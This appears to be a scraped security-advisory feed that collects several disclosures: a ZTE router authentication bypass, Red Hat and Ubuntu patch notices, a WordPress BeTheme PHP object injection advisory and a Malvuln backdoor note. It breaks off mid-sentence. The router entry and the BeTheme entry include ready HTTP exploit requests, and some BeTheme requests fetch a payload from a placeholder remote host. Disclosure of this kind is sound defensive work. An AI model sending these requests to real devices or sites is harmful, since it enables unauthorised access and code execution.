This is a whitepaper discussing CVE-2020-1349 where a remote code execution vulnerability exists in Microsoft Outlook 2019 version 16.0.12624.20424 when it fails to properly handle objects in memory.

Microsoft Outlook 2019 16.0.12624.20424 Remote Code Execution

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 suffers from an authentication bypass vulnerability when alternate HTTP methods are leveraged.

    # Exploit Title: Router ZTE-H108NS - Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# CVE: N/A # Tested on: Debian 5.18.5Description :When specific http methods are listed within a security constraint,then only thosemethods are protected. Router ZTE-H108NS defines the following httpmethods: GET, POST, and HEAD. HEAD method seems to fall under a flawedoperation which allows the HEAD to be implemented correctly with everyResponse Status Code.Proof Of Concept :Below request bypasses successfully the Basic Authentication, andgrants access to the Administration Panel of the Router.HEAD /cgi-bin/tools_admin.asp  HTTP/1.1Host: 192.168.1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: SESSIONID=1cd6bb77Upgrade-Insecure-Requests: 1Cache-Control: max-age=0

ZTE ZXHN-H108NS Authentication Bypass

Red Hat Security Advisory 2022-8543-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8543-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8543  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405   
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409   
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412   
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420   
                   CVE-2022-45421   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3t1TtzjgjWX9erEAQhIpxAApVjEoEzG951crtCuv4E3JMwPoJoF3ONp  
th3oy4c2rt5Gf7WzY6qBqtwmPiN8yYHhuSxWTJvynwiUDqjPM4vWngedRCjqLwbe  
mPXKj4NCSUXQcNAHIk764UqGozB9iz7K4hl6rTjGnVQc77UiEBKppviNNyojxZiJ  
KYFDGL4gAG7zNVXcok/EP/ip1HT9M13NmV2C9eJBwxEWdHBklXs7e91iKFUjuvtC  
NPlcMX9dgHLlbEoFEqYZgvJX7tYfzmY8HMRY3Rylr8awdg//WNMx7W+Ft8DE7xJq  
o+MugHOuQ9p+uLeVCPm4eZWAJIPJXRuAlo2RxQDOsyqjfZYAXOBsHOkIk0bg/8s/  
MSieS1tfwNyr5YdxqHTyv3T6PmUN1ogfOwe4PB9k5ieZVPdGOd/2oSZyZWvpE190  
syxBuMXGddWfmf7i9LqTA6KLnMXJqh8afL6J4MPs7NnYfQ4aWaoyR2B6NMoVU5NW  
VHnWsL113akxAThF8HHt3j0+GclcW7Dr0FKOZSe5TD0EsPE++mYJaAL/sWv7sejK  
cFnWiTSRMbvmPz7/DHv/uB6+aVDFotnjiIzzWa1YsrBhZh2SlPxa9rOEdQ3gJQlD  
MBt/MBfwbaD0zbD5Y2rSzCD5MAHWXSf8mWiuVn1ZZ0vH13kkplNPIHxcP5GC+0Yd  
qlDTRrHRDmY=  
=bM1x  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8543-01

Ubuntu Security Notice 5729-2 - It was discovered that a race condition existed in the instruction emulator of the Linux kernel on Arm 64-bit systems. A local attacker could use this to cause a denial of service. Hsin-Wei Hung discovered that the BPF subsystem in the Linux kernel contained an out-of-bounds read vulnerability in the x86 JIT compiler. A local attacker could possibly use this to cause a denial of service or expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5729-2  
November 18, 2022

linux-gcp-5.15, linux-gke-5.15, linux-intel-iotg, linux-raspi  
vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-raspi: Linux kernel for Raspberry Pi systems  
- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-gke-5.15: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that a race condition existed in the instruction emulator  
of the Linux kernel on Arm 64-bit systems. A local attacker could use this  
to cause a denial of service (system crash). (CVE-2022-20422)

Hsin-Wei Hung discovered that the BPF subsystem in the Linux kernel  
contained an out-of-bounds read vulnerability in the x86 JIT compiler. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or expose sensitive information (kernel memory). (CVE-2022-2905)

Hao Sun and Jiacheng Xu discovered that the NILFS file system  
implementation in the Linux kernel contained a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-2978)

Abhishek Shah discovered a race condition in the PF_KEYv2 implementation in  
the Linux kernel. A local attacker could use this to cause a denial of  
service (system crash) or possibly expose sensitive information (kernel  
memory). (CVE-2022-3028)

It was discovered that the Netlink device interface implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability with some network device drivers. A local  
attacker with admin access to the network device could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-3625)

It was discovered that the IDT 77252 ATM PCI device driver in the Linux  
kernel did not properly remove any pending timers during device exit,  
resulting in a use-after-free vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-3635)

Gwangun Jung discovered that the netfilter subsystem in the Linux kernel  
did not properly prevent binding to an already bound chain. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2022-39190)

Xingyuan Mo and Gengjia Chen discovered that the Promise SuperTrak EX  
storage controller driver in the Linux kernel did not properly handle  
certain structures. A local attacker could potentially use this to expose  
sensitive information (kernel memory). (CVE-2022-40768)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  linux-image-5.15.0-1018-intel-iotg  5.15.0-1018.23  
  linux-image-5.15.0-1018-raspi   5.15.0-1018.20  
  linux-image-5.15.0-1018-raspi-nolpae  5.15.0-1018.20  
  linux-image-intel-iotg          5.15.0.1018.19  
  linux-image-raspi               5.15.0.1018.17  
  linux-image-raspi-nolpae        5.15.0.1018.17

Ubuntu 20.04 LTS:  
  linux-image-5.15.0-1020-gke     5.15.0-1020.25~20.04.1  
  linux-image-5.15.0-1022-gcp     5.15.0-1022.29~20.04.1  
  linux-image-gcp                 5.15.0.1022.29~20.04.1  
  linux-image-gke-5.15            5.15.0.1020.25~20.04.1

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5729-2  
  https://ubuntu.com/security/notices/USN-5729-1  
  CVE-2022-20422, CVE-2022-2905, CVE-2022-2978, CVE-2022-3028,  
  CVE-2022-3625, CVE-2022-3635, CVE-2022-39190, CVE-2022-40768

Package Information:  
  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1018.23  
  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1018.20  
  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1022.29~20.04.1  
  https://launchpad.net/ubuntu/+source/linux-gke-5.15/5.15.0-1020.25~20.04.1

Ubuntu Security Notice USN-5729-2

WordPress BeTheme theme version 26.5.1.4 suffers from multiple PHP object injection vulnerabilities when processing input.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Betheme  
Vendor URL:     https://muffingroup.com/betheme/  
Type:           Deserialization of Untrusted Data [CWE-502]  
Date found:     2022-11-02  
Date published: 2022-11-18  
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE:            CVE-2022-3861

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
BeTheme 26.5.1.4 and below

4. INTRODUCTION  
===============  
Ever since Betheme was just an idea, we knew that it would be different from all  
other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could  
easily adapt to any project you need to work on without writing any code. A theme  
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress theme is vulnerable to multiple PHP Object injections when processing  
input to multiple, privileged Wordpress ajax routes:

-mfn_builder_import -> "mfn-items-import" parameter  
-mfn_builder_import_page -> "mfn-items-import-page" parameter  
-importdata -> "import" parameter  
-importsinglepage -> "import" parameter  
-importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at  
least Wordpress "Contributer" rights.

Successful exploits can allow the attacker to execute arbitrary code.

6. PROOF OF CONCEPT  
===================  
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 75  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 114  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 83  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

7. SOLUTION  
===========  
Update to version 26.6

8. REPORT TIMELINE  
==================  
2022-11-01: Discovery of the vulnerability  
2022-11-03: CVE requested from Wordfence (CNA)  
2022-11-04: Wordfence assigns CVE-2022-3861  
2022-11-08: Vendor notification  
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond  
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability  
2022-11-18: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress BeTheme 26.5.1.4 PHP Object Injection

Ubuntu Security Notice 5686-3 - USN-5686-1 fixed vulnerabilities in Git. This update provides the corresponding updates for Ubuntu 22.10. Cory Snider discovered that Git incorrectly handled certain symbolic links. An attacker could possibly use this issue to cause an unexpected behaviour.

    ==========================================================================Ubuntu Security Notice USN-5686-3November 21, 2022git vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10Summary:Several security issues were fixed in Git.Software Description:- git: fast, scalable, distributed revision control systemDetails:USN-5686-1 fixed vulnerabilities in Git. This update provides the correspondingupdates for Ubuntu 22.10.Original advisory details: Cory Snider discovered that Git incorrectly handled certain symbolic links. An attacker could possibly use this issue to cause an unexpected behaviour. (CVE-2022-39253) Kevin Backhouse discovered that Git incorrectly handled certain command strings. An attacker could possibly use this issue to arbitrary code execution. (CVE-2022-39260)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  git                             1:2.37.2-1ubuntu1.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5686-3  https://ubuntu.com/security/notices/USN-5686-1  CVE-2022-39253, CVE-2022-39260Package Information:  https://launchpad.net/ubuntu/+source/git/1:2.37.2-1ubuntu1.1

Ubuntu Security Notice USN-5686-3

Red Hat Security Advisory 2022-8545-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8545-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8545  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405   
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409   
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412   
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420   
                   CVE-2022-45421   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
thunderbird-102.5.0-2.el8_6.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.5.0-2.el8_6.s390x.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.s390x.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.s390x.rpm

x86_64:  
thunderbird-102.5.0-2.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3t1S9zjgjWX9erEAQjuAg/+MU5G1KTLHnjHWGMhgL2YQHyHLvMASYoQ  
PSXe8qCZsgE0n0v4HRhLdG0idmJWTxKx3zslkqCGx6+md/ghTrTzhyBgzuNmbBrK  
yRJlfOgoSEonEIlLJpWh+nH+17d4aCXq/Uai7I4eKTknYGJ4RuS09p/b9wzJyDHD  
kZakzG4PfIbeAxaKV3cJs+OTfuY58Fvx3/+8gz1rMRiE8fgm+Q/gb2x6pMkpnMEs  
SS//xwoFPnagQF0/pdcjGtKaWaYlam94J++toz5JV4WN1dVuixmPQeimy6fzcuaK  
B8RfNvJaNllEnqHXSKw+sCJx9r4VeO13AoSx2L5pvY7gaGWjUZM7o7fbqfVuCdny  
3WYG5CVVgGWAMdW2w+VmZW/pZamH+EEnYnMe7BAbcSsPaI5Ny82KibaTEoextRig  
lLHLeN2pRi7sDEzgtx9h3QAgfcityk2ePpBZZ6A8ZvO9UNDfCrc4jl97WDfe7zsS  
AuT5tTC6ebwFg1g+fD8Ci8vwW8C+fFUyyzib+dCDQOWC8mQf4+RWLjd56FKOtT/5  
2BVtIXVX4IbXBSdLNebmRNNx9ftrajZxPu/8lpeHyNDBlHY8uLtD+QcS4G3P+vUl  
usr1wgSw2dd0bc32g7JsTuWp0buFs7IY9Nop9h+FyPperIbfYbRirB8Ekndad26J  
A+ICpbo2nTA=  
=LmmD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8545-01

Backdoor.Win32.Oblivion.01.a malware suffers from an insecure transit vulnerability due to sending passwords in the clear over the wire.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/aef85cf0d521eaa6aade11f95ea07ebe.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Oblivion.01.aVulnerability: Insecure Transit Password DisclosureDescription: The malware listens on TCP port 7826 and makes HTTP GET requests to port 80 for "/scripts/WWPMsg.dll". The system logon credentials "Pass=beacytan" are sent plaintext via the URL query string. Third party attackers who can sniff traffic may locate the credentials which can also potentially be leaked to web server logs and or shared systems.Family: OblivionType: PE32MD5: aef85cf0d521eaa6aade11f95ea07ebeVuln ID: MVID-2022-0658Disclosure: 11/18/2022Exploit/PoC:tcpdumpGET /scripts/WWPMsg.dll?from=Oblivion&fromemail=Oblivion@Oblivion.com&subject=User+Online&body=Oblivion+Server+Online!!+[OS=Win]+[ComputerName=DESKTOP-2C4IQJO]+[IP=192.168.18.125]+[Port=7826]+[Pass=beacytan]+[Ver=0.1]&to=121768128 HTTP/1.0" 404 -Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any 